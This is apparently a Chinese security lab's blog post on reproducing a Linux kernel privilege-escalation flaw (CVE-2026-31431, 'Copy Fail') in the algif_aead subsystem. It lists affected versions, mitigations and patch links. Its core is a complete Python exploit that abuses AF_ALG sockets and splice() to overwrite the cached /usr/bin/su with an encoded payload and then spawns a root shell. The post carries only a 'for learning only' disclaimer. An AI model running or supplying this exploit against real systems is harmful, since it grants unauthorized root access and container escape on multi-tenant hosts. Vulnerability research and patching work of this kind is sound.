当前位置:首页>Linux>【成功复现】Linux Kernel本地权限提升漏洞(CVE-2026-31431)

【成功复现】Linux Kernel本地权限提升漏洞(CVE-2026-31431)

  • 2026-10-11 07:42:18
【成功复现】Linux Kernel本地权限提升漏洞(CVE-2026-31431)

网安引领时代,弥天点亮未来  

0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。

Linux kernel存在安全漏洞,该漏洞源于algif_aead操作模式问题,可能导致安全风险。Linux内核权限提升漏洞(CVE-2026-31431),被命名为"Copy Fail";由于algif_aead子系统在AEAD解密过程和splice() 系统调用时存在逻辑缺陷,具有普通权限的本地攻击者可通过构造特定的AF_ALG socket操作序列篡改任意可读文件(setuid等)在内存中的页缓存副本,从而实现从普通用户提升至root权限。在多租户服务器、跳板机或容器云环境中,普通用户及容器内进程可借此实现本地提权或容器逃逸。

0x02影响版本
Linux Kernel < 6.18.22
Linux Kernel < 6.19.12
Linux Kernel < 7.0-rc7
0x03漏洞复现
1.连接环境
查看当前用户为普通用户

2.漏洞复现

上传漏洞利用exp文件,成功提权到root

python代码
#!/usr/bin/env python3import os as g,zlib,socket as sdef d(x):return bytes.fromhex(x)def c(f,t,c): a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) try:u.recv(8+t) except:0f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))while i<len(e):c(f,i,e[i:i+4]);i+=4g.system("su")
0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

临时缓解方案

1、在不影响业务的情况下,可通过禁用algif_aead模块以阻断攻击面:

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf && rmmod algif_aead 2>/dev/null

2、在容器或CI/CD环境,建议通过Seccomp配置禁止进程创建AF_ALG类型的套接字,以防止容器逃逸风险。

  建议尽快升级修复漏洞,再次声明本文仅供学习使用,非法他用责任自负!   

https://www.kernel.org/ https://github.com/theori-io/copy-fail-CVE-2026-31431

弥天简介

学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫,
予以风动,
必降弥天之润!

   弥  天

安全实验室

最新文章

随机文章